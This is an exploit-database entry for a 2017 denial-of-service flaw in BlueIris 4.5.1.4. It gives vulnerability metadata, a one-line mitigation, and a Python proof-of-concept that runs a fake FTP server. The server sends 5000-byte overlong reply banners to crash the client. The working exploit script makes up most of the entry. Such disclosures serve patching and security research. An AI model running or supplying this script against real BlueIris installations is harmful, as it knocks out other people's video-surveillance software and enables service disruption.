BlueIris - Denial of Service

vendor:

BlueIris

by:

Peter Baris

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: BlueIris

Affected Version From: 4.5.1.4

Affected Version To: 4.5.1.4

Patch Exists: Yes

Related CWE: N/A

CPE: blueirissoftware.com/blueiris.exe

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Server 2008 R2 Standard x64

2017

BlueIris – Denial of Service

Start this fake FTP server and create an FTP connection in the software. Use the 'Test' button to trigger the vulnerability.

Mitigation:

Ensure that the software is up to date and that all security patches are applied.

Source

Exploit-DB raw data:

import socket


# Title: BlueIris - Denial of Service
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://blueirissoftware.com/blueiris.exe
# Version: 4.5.1.4
# Tested on: Windows Server 2008 R2 Standard x64


# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.

buffer = "A"*5000
port = 21
s = socket.socket()
ip = '0.0.0.0'             
s.bind((ip, port))            
s.listen(5)                    

 
print 'Listening on FTP port: '+str(port)
 
while True:
	conn, addr = s.accept()     
	conn.send('220 '+buffer+'\r\n')
	conn.recv(1024)
	conn.send('250 '+buffer+'\r\n')
	conn.close()